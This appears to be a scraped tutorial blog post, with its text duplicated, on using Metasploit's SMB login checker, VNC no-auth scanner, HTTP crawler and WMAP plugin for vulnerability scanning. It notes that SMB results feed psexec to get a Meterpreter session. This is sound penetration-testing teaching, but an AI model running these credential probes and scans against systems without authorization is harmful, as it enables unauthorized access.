Interaction of vulnerability scanners with Metasploit. Part 1
We are starting a series of tutorial articles on the interaction of vulnerability scanners with Metasploit.
Required software: Kali Linux .
Required knowledge: experience with the Linux console (in particular, the Kali Linux distribution) and the Metasploit console .
Most attacks are based on software vulnerabilities or configuration errors. Therefore, the recommended measures to ensure the organization’s information security are regular system scans for vulnerabilities and penetration testing.
')
Vulnerability scans allow you to check the range of specified IP addresses for possible security problems, providing Pentesters with information on the likely attack vectors. When working with vulnerability scanners, you need to remember that they can be wrong and give out false or incorrect information.
As you know, Metasploit Framework is a tool for creating, testing and using exploits. But, thanks to the support of modules and plug-ins, it may well fit to search for vulnerabilities.
In the first part, we will look at the modules built into Metasploit, which allow you to identify the most common security holes.
The SMB Login Check module connects via the SMB protocol to a specified range of ip-addresses and determines whether a username / password can be accessed by the link.
Load the module
set the necessary settings and run it
It should be borne in mind that such a scan will not go unnoticed, because each time an authentication attempt fails, a corresponding entry in the Windows log is created. Further, successful scan results can be used in the windows / smb / psexec exploit module to create a Meterpreter session.
The VNC scanner will search for VNC servers without password authentication. Some system administrators ignore information security requirements and do not set passwords to establish a connection, which is detected during the scanning process. To use the VNC scanner, you must first select the auxiliary / scanner / vnc / vnc_none_auth module
set the settings and then run it
At the end of the scan, the result will be displayed with a list of vulnerable VNC servers.
WMAP is a feature-rich web vulnerability scanner based on SQLMap. Thanks to the interaction with Metasploit, we can scan web applications directly from the framework.
To begin with, we will use the built-in module Metasploit Web Crawler - a search robot that allows you to determine the structure of the site and works together with wmap.
specify the address of the site and its start page (left default). Now the module is ready for operation.
Next, download the wmap plugin
At this stage of scanning, we already have information about the structure of the site, which is stored in our database. You can view it using the wmap_site –s [id] command, where id is the number of the target in the wmap_sites –l list
Now we decide on the purpose
Here you can set as a range of ip-addresses, and specify the url, leading to a specific section of the site.
Automatic vulnerability scan is started with the wmap_run command.
See the list of modules available for scanning our target.
You can start as a specific module by pointing to it, for example, wmap_run -e auxiliary / scanner / http / robots_txt, or run all the listed modules at once (which we will do)
After the scan is completed, the information about the detected vulnerabilities will be stored in the WMAP database, Let's see what he found there
To be continued….
Used Books:
Metasploit Unleashed. Vulnerability Scanning
Metasploit Unleashed. Scanner VNC Auxiliary Modules
Rapid7. VNC Authentication None Detection
Rapid7. CVE-1999-0506 SMB Login Check Scanner
Metasploit Web Crawler
Metasploit Redmine Interface. Metasploit Framework. WMAP
Required software: Kali Linux .
Required knowledge: experience with the Linux console (in particular, the Kali Linux distribution) and the Metasploit console .
Most attacks are based on software vulnerabilities or configuration errors. Therefore, the recommended measures to ensure the organization’s information security are regular system scans for vulnerabilities and penetration testing.
')
Vulnerability scans allow you to check the range of specified IP addresses for possible security problems, providing Pentesters with information on the likely attack vectors. When working with vulnerability scanners, you need to remember that they can be wrong and give out false or incorrect information.
As you know, Metasploit Framework is a tool for creating, testing and using exploits. But, thanks to the support of modules and plug-ins, it may well fit to search for vulnerabilities.
In the first part, we will look at the modules built into Metasploit, which allow you to identify the most common security holes.
SMB Login Check
The SMB Login Check module connects via the SMB protocol to a specified range of ip-addresses and determines whether a username / password can be accessed by the link.
Load the module
use auxiliary/scanner/smb/smb_loginset the necessary settings and run it
It should be borne in mind that such a scan will not go unnoticed, because each time an authentication attempt fails, a corresponding entry in the Windows log is created. Further, successful scan results can be used in the windows / smb / psexec exploit module to create a Meterpreter session.
VNC authentication
The VNC scanner will search for VNC servers without password authentication. Some system administrators ignore information security requirements and do not set passwords to establish a connection, which is detected during the scanning process. To use the VNC scanner, you must first select the auxiliary / scanner / vnc / vnc_none_auth module
set the settings and then run it
At the end of the scan, the result will be displayed with a list of vulnerable VNC servers.
WMAP Web Scanner
WMAP is a feature-rich web vulnerability scanner based on SQLMap. Thanks to the interaction with Metasploit, we can scan web applications directly from the framework.
To begin with, we will use the built-in module Metasploit Web Crawler - a search robot that allows you to determine the structure of the site and works together with wmap.
use auxiliary/scanner/http/crawlerspecify the address of the site and its start page (left default). Now the module is ready for operation.
Next, download the wmap plugin
load wmapAt this stage of scanning, we already have information about the structure of the site, which is stored in our database. You can view it using the wmap_site –s [id] command, where id is the number of the target in the wmap_sites –l list
wmap_site –s 0Now we decide on the purpose
wmap_targets -t 192.168.42.129Here you can set as a range of ip-addresses, and specify the url, leading to a specific section of the site.
Automatic vulnerability scan is started with the wmap_run command.
See the list of modules available for scanning our target.
wmap_run –tYou can start as a specific module by pointing to it, for example, wmap_run -e auxiliary / scanner / http / robots_txt, or run all the listed modules at once (which we will do)
wmap_run -eAfter the scan is completed, the information about the detected vulnerabilities will be stored in the WMAP database, Let's see what he found there
wmap_vulns –lTo be continued….
Used Books:
Metasploit Unleashed. Vulnerability Scanning
Metasploit Unleashed. Scanner VNC Auxiliary Modules
Rapid7. VNC Authentication None Detection
Rapid7. CVE-1999-0506 SMB Login Check Scanner
Metasploit Web Crawler
Metasploit Redmine Interface. Metasploit Framework. WMAP
Source: https://habr.com/ru/post/215313/
All Articles